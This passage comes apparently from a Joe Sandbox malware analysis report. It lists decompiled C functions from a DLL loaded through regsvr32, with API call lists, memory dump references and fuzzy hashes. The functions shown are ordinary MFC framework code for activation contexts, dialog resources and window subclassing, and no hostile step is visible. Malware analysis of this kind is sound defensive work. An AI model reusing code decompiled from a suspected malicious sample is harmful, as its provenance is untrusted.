                                                                                                                                                                            				char _t19;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				_Unknown_base(*)()* _t22;
                                                                                                                                                                            				_Unknown_base(*)()* _t23;
                                                                                                                                                                            
                                                                                                                                                                            				_t16 = __esi;
                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                            				 *__ecx = _a4;
                                                                                                                                                                            				_a4 = 0;
                                                                                                                                                                            				_t19 =  *0x10058f2c; // 0x0
                                                                                                                                                                            				if(_t19 == 0) {
                                                                                                                                                                            					_t15 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                            					_t20 = _t15;
                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						E1000A0DB(0, _t12, _t15, _t16, _t20);
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
                                                                                                                                                                            					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
                                                                                                                                                                            					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
                                                                                                                                                                            					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                                                                                                                                            					_t21 =  *0x10058f1c; // 0x0
                                                                                                                                                                            					 *0x10058f28 = _t9;
                                                                                                                                                                            					_t16 = _t16;
                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                            						__eflags =  *0x10058f20; // 0x0
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags =  *0x10058f24; // 0x0
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t9;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t22 =  *0x10058f20; // 0x0
                                                                                                                                                                            						if(_t22 == 0) {
                                                                                                                                                                            							goto L2;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t23 =  *0x10058f24; // 0x0
                                                                                                                                                                            							if(_t23 == 0) {
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t20 = _t9;
                                                                                                                                                                            								if(_t9 == 0) {
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x10058f2c = 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t18;
                                                                                                                                                                            			}














                                                                                                                                                                            0x1000a1f9
                                                                                                                                                                            0x1000a1f9
                                                                                                                                                                            0x1000a1ff
                                                                                                                                                                            0x1000a203
                                                                                                                                                                            0x1000a206
                                                                                                                                                                            0x1000a209
                                                                                                                                                                            0x1000a210
                                                                                                                                                                            0x1000a221
                                                                                                                                                                            0x1000a223
                                                                                                                                                                            0x1000a225
                                                                                                                                                                            0x1000a227
                                                                                                                                                                            0x1000a227
                                                                                                                                                                            0x1000a227
                                                                                                                                                                            0x1000a241
                                                                                                                                                                            0x1000a24e
                                                                                                                                                                            0x1000a25b
                                                                                                                                                                            0x1000a260
                                                                                                                                                                            0x1000a262
                                                                                                                                                                            0x1000a268
                                                                                                                                                                            0x1000a26d
                                                                                                                                                                            0x1000a26e
                                                                                                                                                                            0x1000a286
                                                                                                                                                                            0x1000a28c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a28e
                                                                                                                                                                            0x1000a28e
                                                                                                                                                                            0x1000a294
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a296
                                                                                                                                                                            0x1000a296
                                                                                                                                                                            0x1000a298
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a298
                                                                                                                                                                            0x1000a294
                                                                                                                                                                            0x1000a270
                                                                                                                                                                            0x1000a270
                                                                                                                                                                            0x1000a276
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a278
                                                                                                                                                                            0x1000a278
                                                                                                                                                                            0x1000a27e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a280
                                                                                                                                                                            0x1000a280
                                                                                                                                                                            0x1000a282
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000a284
                                                                                                                                                                            0x1000a282
                                                                                                                                                                            0x1000a27e
                                                                                                                                                                            0x1000a276
                                                                                                                                                                            0x1000a29a
                                                                                                                                                                            0x1000a29a
                                                                                                                                                                            0x1000a2a6

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                            • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                                                            • API String ID: 667068680-3617302793
                                                                                                                                                                            • Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                                                                                            • Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
                                                                                                                                                                            • Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                                                                                            • Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                            				signed int _t63;
                                                                                                                                                                            				signed short _t71;
                                                                                                                                                                            				signed int _t84;
                                                                                                                                                                            				void* _t94;
                                                                                                                                                                            				struct HINSTANCE__* _t96;
                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                            				void* _t98;
                                                                                                                                                                            				signed int _t100;
                                                                                                                                                                            				void* _t101;
                                                                                                                                                                            				void* _t102;
                                                                                                                                                                            
                                                                                                                                                                            				_t102 = __eflags;
                                                                                                                                                                            				_t94 = __edx;
                                                                                                                                                                            				_push(0x24);
                                                                                                                                                                            				E10017BF4(E10028029, __ebx, __edi, __esi);
                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                                                                                                                                            				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                                                                                                                                            				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                                                                                                                                            				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
                                                                                                                                                                            				_t96 =  *(_t54 + 0xc);
                                                                                                                                                                            				_t84 = 0;
                                                                                                                                                                            				_t103 =  *(_t100 + 0x58);
                                                                                                                                                                            				if( *(_t100 + 0x58) != 0) {
                                                                                                                                                                            					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
                                                                                                                                                                            					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                                                                                                                                            					 *(_t101 - 0x18) = _t54;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t101 - 0x18) != _t84) {
                                                                                                                                                                            					_t54 = LockResource( *(_t101 - 0x18));
                                                                                                                                                                            					 *(_t101 - 0x1c) = _t54;
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t101 - 0x1c) != _t84) {
                                                                                                                                                                            					_t86 = _t100;
                                                                                                                                                                            					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
                                                                                                                                                                            					E1000FC04(_t84, _t96, __eflags);
                                                                                                                                                                            					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                                                                                                                                            					__eflags =  *(_t101 - 0x14) - _t84;
                                                                                                                                                                            					 *(_t101 - 0x2c) = _t84;
                                                                                                                                                                            					 *(_t101 - 0x24) = _t84;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								EnableWindow( *(_t101 - 0x14), 0);
                                                                                                                                                                            								 *(_t101 - 0x2c) = 1;
                                                                                                                                                                            								_t84 = E1000A7CE();
                                                                                                                                                                            								__eflags = _t84;
                                                                                                                                                                            								 *(_t101 - 0x24) = _t84;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t86 = _t84;
                                                                                                                                                                            									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										_t86 = _t84;
                                                                                                                                                                            										__eflags = E100128F8(_t84);
                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                            											_t86 = _t84;
                                                                                                                                                                            											E10012913(_t84, 0);
                                                                                                                                                                            											 *(_t101 - 0x28) = 1;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                                                                                            					E100115DC(_t96, __eflags, _t100);
                                                                                                                                                                            					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                                                                                                                                            					_push(_t96);
                                                                                                                                                                            					_push(_t58);
                                                                                                                                                                            					_push( *(_t101 - 0x1c));
                                                                                                                                                                            					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
                                                                                                                                                                            					_t97 = 0;
                                                                                                                                                                            					__eflags = _t59;
                                                                                                                                                                            					if(_t59 != 0) {
                                                                                                                                                                            						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                                                                                                                                            						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                                                                                                                                            							_t98 = 4;
                                                                                                                                                                            							_t71 = E10012862(_t100);
                                                                                                                                                                            							__eflags = _t71 & 0x00000100;
                                                                                                                                                                            							if((_t71 & 0x00000100) != 0) {
                                                                                                                                                                            								_t98 = 5;
                                                                                                                                                                            							}
                                                                                                                                                                            							E1000F6F2(_t100, _t98);
                                                                                                                                                                            							_t97 = 0;
                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                                                                                                                                            						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                                                                                                                                            							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                                                                            					__eflags =  *(_t101 - 0x28) - _t97;
                                                                                                                                                                            					if( *(_t101 - 0x28) != _t97) {
                                                                                                                                                                            						E10012913(_t84, 1);
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t101 - 0x2c) - _t97;
                                                                                                                                                                            					if( *(_t101 - 0x2c) != _t97) {
                                                                                                                                                                            						EnableWindow( *(_t101 - 0x14), 1);
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t101 - 0x14) - _t97;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							SetActiveWindow( *(_t101 - 0x14));
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *((intOrPtr*)( *_t100 + 0x60))();
                                                                                                                                                                            					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
                                                                                                                                                                            					__eflags =  *(_t100 + 0x58) - _t97;
                                                                                                                                                                            					if( *(_t100 + 0x58) != _t97) {
                                                                                                                                                                            						FreeResource( *(_t101 - 0x18));
                                                                                                                                                                            					}
                                                                                                                                                                            					_t63 =  *(_t100 + 0x44);
                                                                                                                                                                            					goto L31;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t63 = _t54 | 0xffffffff;
                                                                                                                                                                            					L31:
                                                                                                                                                                            					return E10017C60(_t63);
                                                                                                                                                                            				}
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000cb74
                                                                                                                                                                            0x1000cb74
                                                                                                                                                                            0x1000cb74
                                                                                                                                                                            0x1000cb7b
                                                                                                                                                                            0x1000cb80
                                                                                                                                                                            0x1000cb82
                                                                                                                                                                            0x1000cb88
                                                                                                                                                                            0x1000cb8e
                                                                                                                                                                            0x1000cb91
                                                                                                                                                                            0x1000cb96
                                                                                                                                                                            0x1000cb99
                                                                                                                                                                            0x1000cb9b
                                                                                                                                                                            0x1000cb9e
                                                                                                                                                                            0x1000cba5
                                                                                                                                                                            0x1000cbb6
                                                                                                                                                                            0x1000cbbc
                                                                                                                                                                            0x1000cbbc
                                                                                                                                                                            0x1000cbc2
                                                                                                                                                                            0x1000cbc7
                                                                                                                                                                            0x1000cbcd
                                                                                                                                                                            0x1000cbcd
                                                                                                                                                                            0x1000cbd3
                                                                                                                                                                            0x1000cbdd
                                                                                                                                                                            0x1000cbe4
                                                                                                                                                                            0x1000cbe7
                                                                                                                                                                            0x1000cbec
                                                                                                                                                                            0x1000cbef
                                                                                                                                                                            0x1000cbf2
                                                                                                                                                                            0x1000cbf5
                                                                                                                                                                            0x1000cbf8
                                                                                                                                                                            0x1000cc00
                                                                                                                                                                            0x1000cc03
                                                                                                                                                                            0x1000cc0e
                                                                                                                                                                            0x1000cc10
                                                                                                                                                                            0x1000cc17
                                                                                                                                                                            0x1000cc1d
                                                                                                                                                                            0x1000cc29
                                                                                                                                                                            0x1000cc2b
                                                                                                                                                                            0x1000cc2d
                                                                                                                                                                            0x1000cc30
                                                                                                                                                                            0x1000cc34
                                                                                                                                                                            0x1000cc3c
                                                                                                                                                                            0x1000cc3e
                                                                                                                                                                            0x1000cc40
                                                                                                                                                                            0x1000cc47
                                                                                                                                                                            0x1000cc49
                                                                                                                                                                            0x1000cc4d
                                                                                                                                                                            0x1000cc4f
                                                                                                                                                                            0x1000cc54
                                                                                                                                                                            0x1000cc54
                                                                                                                                                                            0x1000cc49
                                                                                                                                                                            0x1000cc3e
                                                                                                                                                                            0x1000cc30
                                                                                                                                                                            0x1000cc10
                                                                                                                                                                            0x1000cc03
                                                                                                                                                                            0x1000cc5b
                                                                                                                                                                            0x1000cc60
                                                                                                                                                                            0x1000cc68
                                                                                                                                                                            0x1000cc6d
                                                                                                                                                                            0x1000cc6e
                                                                                                                                                                            0x1000cc6f
                                                                                                                                                                            0x1000cc74
                                                                                                                                                                            0x1000cc79
                                                                                                                                                                            0x1000cc7b
                                                                                                                                                                            0x1000cc7d
                                                                                                                                                                            0x1000cc7f
                                                                                                                                                                            0x1000cc83
                                                                                                                                                                            0x1000cc87
                                                                                                                                                                            0x1000cc8a
                                                                                                                                                                            0x1000cc8f
                                                                                                                                                                            0x1000cc93
                                                                                                                                                                            0x1000cc97
                                                                                                                                                                            0x1000cc97
                                                                                                                                                                            0x1000cc9b
                                                                                                                                                                            0x1000cca0
                                                                                                                                                                            0x1000cca0
                                                                                                                                                                            0x1000cca0
                                                                                                                                                                            0x1000cca2
                                                                                                                                                                            0x1000cca5
                                                                                                                                                                            0x1000ccb3
                                                                                                                                                                            0x1000ccb3
                                                                                                                                                                            0x1000cca5
                                                                                                                                                                            0x1000ccb8
                                                                                                                                                                            0x1000ccdb
                                                                                                                                                                            0x1000ccde
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000cce9
                                                                                                                                                                            0x1000ccec
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccf9
                                                                                                                                                                            0x1000ccfc
                                                                                                                                                                            0x1000cd04
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd16
                                                                                                                                                                            0x1000cd1b
                                                                                                                                                                            0x1000cd20
                                                                                                                                                                            0x1000cd23
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd2e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000cbd5
                                                                                                                                                                            0x1000cbd5
                                                                                                                                                                            0x1000cd31
                                                                                                                                                                            0x1000cd36
                                                                                                                                                                            0x1000cd36

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000CB7B
                                                                                                                                                                            • FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
                                                                                                                                                                            • LockResource.KERNEL32(?,00000024,100014EC,00000000,F0ED3D8B), ref: 1000CBC7
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 1000CBFA
                                                                                                                                                                            • IsWindowEnabled.USER32(?), ref: 1000CC08
                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 1000CC17
                                                                                                                                                                              • Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901
                                                                                                                                                                              • Part of subcall function 10012913: EnableWindow.USER32(?,F0ED3D8B), ref: 10012920
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                                                                                            • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,F0ED3D8B), ref: 1000CD0C
                                                                                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,F0ED3D8B), ref: 1000CD28
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1509511306-0
                                                                                                                                                                            • Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                                                                                            • Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
                                                                                                                                                                            • Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                                                                                            • Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				void* _t43;
                                                                                                                                                                            				void* _t60;
                                                                                                                                                                            				void* _t64;
                                                                                                                                                                            				struct HWND__* _t66;
                                                                                                                                                                            				CHAR* _t68;
                                                                                                                                                                            				void* _t71;
                                                                                                                                                                            
                                                                                                                                                                            				_t64 = __edx;
                                                                                                                                                                            				_t60 = __ecx;
                                                                                                                                                                            				_push(0x40);
                                                                                                                                                                            				E10017BF4(E1002864B, __ebx, __edi, __esi);
                                                                                                                                                                            				_t66 =  *(_t71 + 8);
                                                                                                                                                                            				_t68 = "AfxOldWndProc423";
                                                                                                                                                                            				_t31 = GetPropA(_t66, _t68);
                                                                                                                                                                            				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                                                                                                                                            				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                                                                                            				 *(_t71 - 0x18) = _t31;
                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                            				_t33 =  *(_t71 + 0xc) - 6;
                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                            					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
                                                                                                                                                                            					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t40 = _t33 - 0x1a;
                                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                                            						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                                                                                                                                            						L9:
                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t43 = _t40 - 0x62;
                                                                                                                                                                            						if(_t43 == 0) {
                                                                                                                                                                            							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                                                                                                                                            							RemovePropA(_t66, _t68);
                                                                                                                                                                            							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t43 != 0x8e) {
                                                                                                                                                                            								L10:
                                                                                                                                                                            								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                                                                            							} else {
                                                                                                                                                                            								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                                                                                                                                            								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                                                                            								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return E10017C60( *(_t71 - 0x14));
                                                                                                                                                                            			}













                                                                                                                                                                            0x10011245
                                                                                                                                                                            0x10011245
                                                                                                                                                                            0x10011245
                                                                                                                                                                            0x1001124c
                                                                                                                                                                            0x10011251
                                                                                                                                                                            0x10011254
                                                                                                                                                                            0x1001125b
                                                                                                                                                                            0x10011261
                                                                                                                                                                            0x10011265
                                                                                                                                                                            0x10011269
                                                                                                                                                                            0x10011271
                                                                                                                                                                            0x10011272
                                                                                                                                                                            0x10011275
                                                                                                                                                                            0x1001131e
                                                                                                                                                                            0x10011330
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001127b
                                                                                                                                                                            0x1001127b
                                                                                                                                                                            0x1001127e
                                                                                                                                                                            0x10011316
                                                                                                                                                                            0x10011335
                                                                                                                                                                            0x10011337
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011280
                                                                                                                                                                            0x10011280
                                                                                                                                                                            0x10011283
                                                                                                                                                                            0x100112dc
                                                                                                                                                                            0x100112e4
                                                                                                                                                                            0x100112f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011285
                                                                                                                                                                            0x1001128a
                                                                                                                                                                            0x10011339
                                                                                                                                                                            0x1001134c
                                                                                                                                                                            0x10011290
                                                                                                                                                                            0x100112a1
                                                                                                                                                                            0x100112be
                                                                                                                                                                            0x100112c6
                                                                                                                                                                            0x100112c6
                                                                                                                                                                            0x1001128a
                                                                                                                                                                            0x10011283
                                                                                                                                                                            0x1001127e
                                                                                                                                                                            0x100112d3

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001124C
                                                                                                                                                                            • GetPropA.USER32 ref: 1001125B
                                                                                                                                                                            • CallWindowProcA.USER32 ref: 100112B5
                                                                                                                                                                              • Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
                                                                                                                                                                              • Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138
                                                                                                                                                                            • SetWindowLongA.USER32 ref: 100112DC
                                                                                                                                                                            • RemovePropA.USER32 ref: 100112E4
                                                                                                                                                                            • GlobalFindAtomA.KERNEL32 ref: 100112EB
                                                                                                                                                                            • GlobalDeleteAtom.KERNEL32 ref: 100112F2
                                                                                                                                                                              • Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871
                                                                                                                                                                            • CallWindowProcA.USER32 ref: 10011346
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                                                            • String ID: AfxOldWndProc423
                                                                                                                                                                            • API String ID: 2702501687-1060338832
                                                                                                                                                                            • Opcode ID: 9ee1106b5f5d5336c81e687cb8c924b5e08a077892bd92312de1f56c1740729b
                                                                                                                                                                            • Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ee1106b5f5d5336c81e687cb8c924b5e08a077892bd92312de1f56c1740729b
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                            				struct HWND__* _t75;
                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                            				signed int _t95;
                                                                                                                                                                            				intOrPtr* _t103;
                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                            				void* _t124;
                                                                                                                                                                            				signed int _t129;
